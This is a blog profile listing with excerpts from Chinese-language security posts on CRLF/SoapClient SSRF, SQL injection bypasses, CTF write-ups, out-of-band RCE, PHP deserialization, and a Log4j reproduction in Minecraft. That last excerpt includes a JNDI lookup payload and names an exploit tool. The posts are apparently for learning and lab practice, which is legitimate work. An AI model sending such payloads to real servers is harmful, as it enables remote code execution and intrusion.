- 博客(12)
- 收藏
- 关注
原创 Session反序列化利用和SoapClient+crlf组合拳进行SSRF详解
简单举个例子还有一个很重要的利用点,CRLF头注入,一个在user_agent,一个在uri,可惜的是这种方式只支持http协议不熟悉CRLF头注入的利用方法咱们开始小课堂:CRLF注入漏洞指的是(CR,ASCII 13,\r,%0d) 和CRLF的概念源自打字机,表明行的结束,计算机出现后沿用了这个概念。回车符:光标移到行首,换行符:光标垂直移到下行。键盘上的回车键(Enter)就可以执行该操作。但是不同的操作系统,行的结束符是不一样的。Windows:使用CRLF表示行的结束。
2023-06-21 11:27:47 390
原创 【记一次】Log4j 漏洞在《我的世界》上复现
首先我们需要一个jndi服务用于漏洞注入,可以在GitHub下载一个jar包(https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0)构造出payload:${jndi:ldap://127.0.0.1:1389/abzi13},然后启动游戏,随便创建个世界进入,按T打开聊天窗口输入payload,即可弹出计算器程序。其次,当然我们需要一个《我的世界》的客户端(目前仅测试1.12.2版本)
2024-06-10 10:45:20 424 1
原创 【CTF】sql注入之无列名注入的姿势
顾名思义,就是在不知道列名的情况下进行 sql 注入。在 mysql => 5 的版本中存在一个名为 information_schema 的库,里面记录着 mysql 中所有表的结构。通常,在 mysql sqli 中,我们会通过此库中的表去获取其他表的结构,也就是表名、列名等。但是这个库经常被 WAF 过滤。当我们通过暴力破解获取到表名后,如何利用呢?
2023-11-27 22:01:44 533
原创 sql注入绕过姿势
所以即使你后面输入了这些sql命令,也不会被当成sql命令来执行了, 因为这些sql命令的执行, 必须先的通过语法分析,生成执行计划,既然语法分析已经完成,已经预编译过了,那么后面输入的参数,是绝对不可能作为sql命令来执行的, 只会被当做字符串字面值参数。或者对用户的输入信息进行严格的过滤,比如日期、年份等格式进行严格限制。1)如果 waf 过滤了逗号,并且只能盲注,在取子串的几个函数中,有一个替代逗号的方法就是使用 from for ,其中 pos 代表从 pos 个开始读取 len 长度的子串。
2023-11-14 22:24:14 159
原创 [GYCTF2020]Blacklist 1
报错注入原理就是我们自己构造请求参数,使接口或者后端返回错误,以达到让我们更多的了解select、update、insert语句的问题所在总之,这道题还是挺简单的。。。
2023-11-14 22:20:56 178
原创 带外攻击(OOB)RCE无回显思路总结详解
向服务器提交一个payload,而服务器响应给我们相关的response信息,大家都叫他带内攻击,这些理论的东西,我们简单理解就好,这里我们就理解成。传输层协议使用带外数据(out-of-band,OOB)来发送一些重要的数据,如果通信一方有重要的数据需要通知对方时,协议能够将这些数据快速地发送到对方。为了发送这些数据,协议一般不使用与普通数据相同的通道,而是使用另外的通道。linux系统的套接字机制支持低层协议发送和接受带外数据。但是TCP协议没有真正意义上的带外数据。
2023-06-23 15:15:01 2468
原创 PHP原生类详解
什么是php原生类PHP 原生类指的是 PHP 内置的类,它们可以直接在 PHP 代码中使用且无需安装或导入任何库。以下是一些常用的 PHP 原生类:1. DateTime 类:用于处理日期和时间,支持各种格式和时间区域。2. PDO 类:用于访问和操作关系型数据库,如 MySQL、PostgreSQL 等。3. FilesystemIterator 类:用于迭代文件系统目录,支持过滤器和递归。4. DOMDocument 类:用于创建和操作 XML 文档,支持 XPath 查询和转换。
2023-06-21 20:20:10 1085
原创 PHP反射类详解
反射是一个动态运行的概念,综合使用他妈可用来帮助我们分析其他类,接口,方法,属性和扩展,还可构建模式,比如动态代理,在一些php框架中使用反射也是很经常,比如kohana,yii,下面是kohana的实现mvc的代码,就是用到了反射!这个类返回时某个类的相关信息,比如 属性,方法,命名空间,实现那些接口等!PHP的反射机制使开发者能够在运行时获取类、方法和属性的信息,并且可以在不知道这些类、方法和属性名称的情况下与它们交互。只不过这里是反着来的,方法在前,对象在后。以上是获取属性的,还有获取类方法的。
2023-06-21 17:55:49 1025
原创 BUUCTF-[网鼎杯 2020 青龙组]AreUSerialz
这里绕过方法就是直接改成public,原因是php7.1以上的版本对属性类型不敏感类型,而public属性序列化不会不可见字符。绕过方法:可以使传入的op是数字2,从而使第一个强比较返回false,而使第二个弱比较返回true。这里注意protacted在序列化之后会出现不可见字符\00*\100,不符合上面的要求。这里的destruct()魔术方法会在传参是2的字符的时候,对传入的参数进行赋值。这里的比较是===强比较,而在process()函数是弱比较。这里需要传入一个序列化之后的类对象。
2023-06-21 15:48:31 137
crc-master碰撞工具
2023-06-24
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人